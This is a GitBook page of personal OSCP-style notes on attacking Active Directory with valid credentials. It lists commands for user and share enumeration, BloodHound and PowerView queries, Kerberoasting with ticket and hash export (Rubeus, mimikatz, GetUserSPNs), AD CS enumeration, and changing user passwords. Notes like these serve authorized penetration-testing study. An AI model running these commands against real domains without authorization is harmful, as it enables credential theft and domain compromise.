M4RCG04M
  • 👨‍💻Welcome to my GitBook
  • WRITEUPS
    • HackTheBox
      • Windows
        • Remote
      • Linux
        • Jarvis
        • Tabby
    • Proving Grounds Play
      • BBScute
      • FunBoxEasyEnum
      • Monitoring
      • Loly
      • Pelican
      • Payday
      • Snookums
  • OSCP Preparation List
    • Hack The Box
    • Proving Grounds
  • NOTES
    • UTILS
      • Useful Files
      • Payloads
      • Lateral Movement
    • ENUMERATION
      • Port 79 (finger)
      • Port 80 (HTTP)
      • Port 111 (RPCBIND)
      • PORT 161/udp (SNMP)
      • PORT 389,636,3268,3269 (LDAP)
      • Port 6697 (IRCD)
      • Database Analysis
      • Grafana
    • FILE TRANSFERS
    • ACTIVE DIRECTORY
      • Known Vulnerabilities
      • Without Credentials
        • Classic Attacks
      • With Username
      • Valid Credentials
      • Lateral Move
      • ACLs/ACEs permissions
      • Active Directory Certificate Services (AD CS)
      • Administrator account
      • Domain Admin
    • EXPLOTATION
      • Port 53 (DNS)
      • Port 80 (HTTP)
        • CMS
        • SQL INJECTION
        • XXE
        • File Upload
        • Cross Site Scripting (XSS)
      • Port 3389 (RDP)
      • Password Attacks
        • Hash Cracking
    • PRIVILEGE ESCALATION
      • Windows
        • Enumeration
        • Windows User Privileges
        • Windows Group Privileges
        • Weak Permissions
        • Windows Vulnerabilities
        • Credential Hunting
        • Tools
      • Linux
        • Enumeration
Powered by GitBook
On this page
  • Get all the users
  • Enumerate SMB Shares
  • BloodHound
  • PowerView
  • Kerberoasting
  • Get Kerberoastable users
  • Get Hash
  • ADCS Enumeration
  • Exploit
  • Connect to computers
  • WinPeas
  • LDAP
  • Change User Password
  1. NOTES
  2. ACTIVE DIRECTORY

Valid Credentials

Get all the users

GetADUsers.py -all -dc-ip <dc-ip> <domain>/<username>
cme smb <ip> -u <user> -p <password> --users

cme smb <ip> -u <user> -p <password> --users | awk '{print $5}' |  grep -v '\[' |  grep -v '-Username-'
rpcclient -U <user> 
rpcclient > enumdomusers
Get-LocalUser
python3 windapsearch.py --dc-ip DCIP -u user -p password --da

Enumerate SMB Shares

cme smb <ip> -u <user> -p <password> --shares

BloodHound

bloodhound-python -d <domain> -u <user> -p <password> -ns <dc-ip> -c all
./rusthound -d <domain> -u '<user>@<domain>' -p <password> -o <outfile> -z
Import-Module sharphound.ps1

Invoke-Blodhound -collectionmethod all -domain <domain>
sharphound.exe -c all -d <domain>

PowerView

Get Domain Information

Get-NetDomain

Get User List

Get-NetUser

Get a specific User

Get-NetUser "user"

Enumerate Password Change && Last Login

Get-NetUser | select cn,pwdlastset,lastlogon

Get Groups

Get-NetGroups

Get a specific Group

Get-NetGroups "Domain Admins"

List Domain Shares

Find-DomainShare

Get Computers

Get-NetComputer | select operatingsystem,dnshostname

Check if we are ADMIN on other Computers

Find-LocalAdminAcess

Check for Logged Users

Get-NetSession -ComputerName files04 -Verbose
.\PsLoggedon.exe

Enumerate ACL

Get-ObjectAcl -Identity "user"

Kerberoasting

Get Kerberoastable users

Get-DomainUser -SPN -Properties SamAccountName, ServicePrincipalName-d 
MATCH (u:User {hasspn:true}) RETURN u

MATCH (u:User {hasspn:true}), (c:Computer), p=shortestPath((u)-[*1..]->(c)) RETURN p

Get Hash

GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\tgs.csv -NoTypeInformation
\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
mimikatz # base64 /out:true
mimikatz # kerberos::list /export

Hash Cracking

ADCS Enumeration

certipy-ad find -username 'user' -password 'password' -dc-ip <IP>
netexec ldap domain.lab -u username -p password -M adcs

Active Directory Certificate Services (AD CS)

Exploit

If we found known vulnerabilities you should exploit them for compromising more systems:

Known Vulnerabilities

Connect to computers

Lateral Move

WinPeas

Upload WinPeas for more in depth enumeration

LDAP

ldapsearch -h <domain> -D <user>@<domain> -w '<password hash>'
-b "dc=support,dc=htb" "*"

Change User Password

If we got "STATUS_PASSWORD_MUST_CHANGE" for some users, we can update a current password to a new one.

smbpasswd -r <ip> -U <username>
PreviousWith UsernameNextLateral Move

Last updated 21 days ago